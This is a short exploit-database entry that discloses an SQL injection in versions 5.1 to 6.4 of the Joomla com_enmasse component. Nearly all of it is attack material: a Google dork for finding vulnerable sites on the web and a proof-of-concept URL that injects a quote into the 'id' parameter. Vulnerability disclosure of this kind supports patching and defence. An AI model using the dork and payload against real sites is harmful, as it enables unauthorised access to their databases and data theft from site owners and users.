Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection

  • Author: Hamed Izadi
    Date: 2016-06-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39953/
  • # Exploit Title: Joomla com_enmasse- SQL Injection
     
     # Author: [ Hamed Izadi ]
    
    						#IRAN
    
    # Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
    # Category: [ Webapps ]
    # Tested on: [ Win ]
    # Versions: 5.1-6.4
    # Date: 2016/06/15
    # Google Dork: inurl:component/enmasse/
    
    
    # PoC:
    # id Parameter Vulnerable To SQL
     
    # Demo:
    # http://server/component/enmasse/term?tmpl=component&id=2%27
    
    
    # Youtube: https://youtu.be/LB5qVnXhzXE
    
    #L u Arg